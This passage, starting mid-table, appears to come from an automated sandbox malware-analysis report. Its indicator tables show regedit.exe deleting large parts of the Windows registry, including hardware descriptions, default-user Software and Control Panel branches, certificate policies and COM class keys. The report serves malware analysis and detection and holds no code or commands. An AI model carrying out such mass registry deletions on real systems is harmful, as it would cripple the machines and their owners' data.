| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Windows\regedit.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\regedit.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\regedit.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\regedit.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Microsoft.Windows.LanguageComponentsInstaller | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Input Method\Hot Keys\00000203 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace492361004\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\SortOrder\AssemblyItem | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.HTM | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace475a1c57b\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{D80D1001-5B38-49E9-9D34-EC9B84779189} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Microsoft.Windows.ParentalControls | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace461026441\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.XboxGamingOverlay_2.34.28001.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4bb18b302\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\HiddenDummyLayouts | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace4cb13e166\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.SoftLanding | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.BackgroundAccess | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace495c536df\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.Calling.SystemAlertNotification | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Cursors | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-1181767204-2009306918-3718769404-1000\02egqfmeggaduhzt | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\Colors | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace48ea9bf97 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.BioEnrollment_cw5n1h2txyewy%5Cresources.pri\1d7e53689ea9e9c | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\System\GameConfigStore\Parents | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.XGpuEjectDialog_cw5n1h2txyewy%5Cresources.pri\1d7e536746cabe0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Cryptography | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SharingMFU | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Policies | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy%5Cresources.pri\1d7e53694d87964 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.System.MiracastReceiver | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\PushNotifications\Backup\Windows.SystemToast.NfpDevicePairing | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Control Panel\Accessibility\HighContrast | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe%5Cresources.pri\1d5acddd8370c4b\a37dfe62 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\System\GameConfigStore\Children | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe%5Cresources.pri\1d5ace48a557267 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\Assemblies | C:\Windows\regedit.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Packages\Microsoft.BioEnrollment_10.0.19041.1023_neutral__cw5n1h2txyewy | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0175-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0063-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Component Categories\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000209A2-0000-0000-C000-000000000046}\ProxyStubClsid32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.fileTypeAssociation\.msixbundle | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4B2E957D-0393-11D1-B1AB-00AA00BA3258}\1.0\0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Word.TemplateMacroEnabled.12\Protocol\StdFileEditing\SetDataFormats | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{75D01070-1234-44E9-82F6-DB5B39A47C13} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\7-Zip.gz\shell\open | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0013-0001-0034-ABCDEFFEDCBA}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0380-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00020865-0000-0000-C000-000000000046}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000C1718-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9B496CE1-811B-11CF-8C77-00AA006B6814}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0094-ABCDEFFEDCBB} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0234-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{30510763-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\.vstx\ShellEx\{BB2E617C-0920-11d1-9A0B-00C04FC2D6C1} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\PackageRepository\Extensions\windows.protocol\xboxmusic\AppXxd1ehghzsv8twt9b8b18jrd6q54mjz0n | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0390-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5852F5ED-8BF4-11D4-A245-0080C6F74284}\MiscStatus\1 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0014-0002-0041-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0042-ABCDEFFEDCBC} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0017-0000-0134-ABCDEFFEDCBC}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5B25A8DC-1780-4178-A629-6BE8B8DEFAA2} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{00020907-0000-0000-C000-000000000046}\NotInsertable | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\dotnet_runtime_56.64.8781_x64 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{768B08BE-40A0-44BE-A52C-65211D3F93A8} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CDE8FCF3-0951-5124-94E5-9B7939B22F58} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EE9CFA8C-F997-4221-BE2F-85A5F603218F}\1.0\FLAGS | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000208AE-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{76F7B787-A67C-4C73-82C7-31F5E3AABC5C} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00024402-0000-0000-C000-000000000046} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\MMS\shell\open\command | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Record\{E1750462-1E90-3099-A505-D9AEBAB4E933}\15.0.0.0 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0373-ABCDEFFEDCBA} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F77A0168-0396-5111-A487-A795F24646B7} | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0018-0000-0161-ABCDEFFEDCBB}\InprocServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2503B6EE-0889-44DF-B920-6D6F9659DEA3}\TypeLib | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\System.Runtime.InteropServices.OutAttribute | C:\Windows\regedit.exe | N/A |
